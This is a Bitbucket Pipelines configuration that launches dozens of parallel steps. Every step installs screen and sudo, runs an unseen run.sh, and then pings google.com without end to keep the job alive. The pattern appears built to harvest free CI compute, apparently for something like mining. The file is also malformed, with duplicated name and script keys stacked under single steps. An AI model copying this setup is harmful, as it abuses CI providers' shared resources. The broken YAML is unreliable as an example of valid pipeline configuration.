image: python:3.8
pipelines:
  default:
    - parallel:
      - step:
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
          name: halah-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-6
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-7
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-8
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-9
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com
      - step:
          name: halah-10
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x run.sh  &&  ./run.sh
            - sleep 5 
            - ping google.com